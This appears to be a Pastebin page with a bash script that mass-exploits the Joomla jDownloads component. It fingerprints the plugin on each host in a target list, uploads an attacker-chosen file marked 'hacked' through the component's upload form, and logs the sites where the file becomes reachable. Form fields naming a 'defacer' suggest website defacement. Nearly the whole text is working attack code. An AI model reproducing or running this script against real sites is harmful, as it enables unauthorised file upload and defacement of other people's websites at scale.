API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 29th, 2014
348
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.99 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. #!/bin/bash
  4. #coder
  5. UploadJD(){
  6. curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
  7. -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
  8. -H "Accept-Language: en-us,en;q=0.5" \
  9. -H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
  10. -F "name=defacerid" \
  11. -F "mail=haxorid@gmail.com" \
  12. -F "catlist=1" \
  13. -F "file_upload=@doczxcvbnm.zip" \
  14. -F "filetitle=document" \
  15. -F "description=id" \
  16. -F "0537bf34386f2f179b57f09ed020e2c0=1" \
  17. -F "send=1" \
  18. -F "senden=Send file" \
  19. -F "description=defacerid" \
  20. -F "option=com_jdownloads" \
  21. -F "view=upload" \
  22. -F "pic_upload=@${namafile}" \
  23. --request POST "http://${1}/index.php?option=com_jdownloads&Itemid=0&view=upload"
  24. }
  25. CD(){
  26. curl --silent --max-time 10 --connect-timeout 10 "http://${1}/images/jdownloads/screenshots/${namafile}" -o tmp/cd.txt
  27. if [ ! -f tmp/cd.txt ];then
  28. echo "--> $urlnya : RTO"
  29. continue
  30. fi
  31. cat tmp/cd.txt | grep -i "hacked" > /dev/null;cd=$?
  32. if [ $cd -eq 0 ];then
  33. echo "--> ${1}/images/jdownloads/screenshots/${namafile} : exploit success"
  34. echo "http://${1}/images/jdownloads/screenshots/${namafile}" >> success.txt
  35. else
  36. echo "--> $urlnya : exploit failed"
  37. fi
  38. rm -f tmp/cd.txt
  39. }
  40. CV(){
  41. curl --silent --max-time 10 --connect-timeout 10 "http://${1}/components/com_jdownloads/jdownloads.js" -o tmp/cv.txt
  42. if [ ! -f tmp/cv.txt ];then
  43. echo "--> $urlnya : RTO"
  44. continue
  45. fi
  46. cat tmp/cv.txt | grep "document.uploadForm.file_upload.value\|com_jdownloads\|Toggles the check state of a group of boxes" > /dev/null;cv=$?
  47. if [ $cv -eq 1 ];then
  48. echo "--> $urlnya : not vuln"
  49. rm -f tmp/cv.txt
  50. continue
  51. else
  52. echo "--> $urlnya : found com_jdownloads"
  53. fi
  54. }
  55. Exp(){
  56. for url in `cat $list`
  57. do
  58. urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
  59. if [ ! -f load.txt ];then
  60. touch load.txt
  61. fi
  62. cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
  63. if [ $ccl -eq 1 ];then
  64. echo $urlnya >> load.txt
  65. else
  66. #udah pernah di load di file load.txt
  67. #kalau mau load ulang,silakan hapus file load.txt
  68. continue
  69. fi
  70. echo "--> $urlnya : check"
  71. CV $urlnya
  72. UploadJD $urlnya
  73. CD $urlnya
  74. done
  75. }
  76. Lengkap(){
  77. if [ ! -d tmp ];then
  78. mkdir tmp
  79. fi
  80. if [ ! -f $namefile ];then
  81. echo "[?] file $namafile gak ada"
  82. exit
  83. fi
  84. if [ ! -f $list ];then
  85. echo "[?] file $list gak ada"
  86. exit
  87. fi
  88. cat $namafile | grep -i "hacked" > /dev/null;chh=$?
  89. if [ $chh -eq 1 ];then
  90. echo "hacked" >> $namafile
  91. fi
  92. echo "zip" > doczxcvbnm.zip
  93. }
  94. read -p "[+] Enter name of gif = " namafile
  95. read -p "[+] Enter list target = " list
  96. Lengkap
  97. Exp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!